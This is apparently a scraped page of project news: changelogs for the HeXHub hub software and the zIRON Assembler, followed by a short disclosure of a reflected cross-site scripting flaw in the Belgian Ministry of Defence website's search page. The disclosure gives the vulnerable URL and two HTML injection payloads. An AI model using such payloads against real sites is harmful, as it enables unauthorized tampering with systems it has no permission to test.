HeXHub 5.10b
Changes in 5.10b
- corrected: the hub did not close the connection after verifying the referrer (thanks to RoLex for reporting this error)- all users who have the spam1 right, LAN users, users who have a localhost IP or hub's IP can send any referrer
- hubs that have a LAN or a localhost IP no longer verify referrers
File information: HeXHub 5.10b
HeXHub 5.10a
Changes in 5.10a
- corrected: user's IP was not checked when receiving the referrer (thanks to RoLex for reporting this error)
File information: HeXHub 5.10a
HeXHub 5.10
Changes in 5.10
- the hub address setting is no longer limited to a single address, it is now a list of addresses separated by commas; only the first address is registered to hublist registration servers and sent to hublist pingers, but all of them are used to verify the address users connected to- new option on the "unknown commands" page: "Make sure the users have the right address in their favorites" (!set cmd ucommands verifyfavs , default is on); if this option is enabled, users who connected to the hub using an unknown address are redirected to the address that is registered to public hublists (the first address from the list that was set using !set hub addresses)
- new event for plugins: onBadSettings(userId,62) ("a wrong address was added to favorites as the address of this hub")
- the user search feature that is used by the "!seen" command was updated to work with the hublist from www.te-home.net
- GeoIP information was updated with GeoIPCountryWhois.csv from December 5th
File information: HeXHub 5.10
zIRON Assembler 2.0.0.5
Changes in 2.0.0.5
Assembler now shows assembled file count.Assembler will automatically create *file*.build.bat if one does not exist.
Added directive #tryinclude, this will not fail if file does not exist.
File information: zIRON Assembler 2.0.0.5
Ministry of Defence of Belgium - XSS
Vulnerable page: http://www.mil.be/def/search/index.aspPoC:
Code
"><h1>XSS found by Team Elite</h1>
Code
"><img src=http://te-home.net/images/logo.png>
You can include any XSS code in search box to reproduce the bug.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.